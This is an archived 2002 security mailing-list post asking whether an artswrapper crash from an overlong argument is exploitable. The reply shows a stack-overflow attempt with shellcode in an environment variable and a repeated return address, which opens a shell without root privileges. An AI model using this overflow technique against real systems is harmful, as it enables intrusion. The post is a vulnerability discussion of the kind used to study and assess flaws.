OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Charles 'core' Stevenson (coredekode.org)
Date: Fri Jan 04 2002 - 01:18:08 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Fuska wrote:
    > r00t:~$ artswrapper -m `perl -e 'print "A"x3000'`
    > >> running as realtime process now (priority 50)
    > Segmentation fault
    >
    > Is this exploitable?
    coreeuclid:~/tmp$ export EXECSHELL=`./execve_ppc`
    ...
    coreeuclid:~/tmp$ artswrapper -m `perl -e 'print
    "\x7f\xff\xfe\x10"x750;'`
    >> running as realtime process now (priority 50)
    sh-2.05a$ id
    uid=1000(core) gid=1000(core) groups=1000(core)
    sh-2.05a$ Alarm clock

    Not directly at least...

    peace,
    core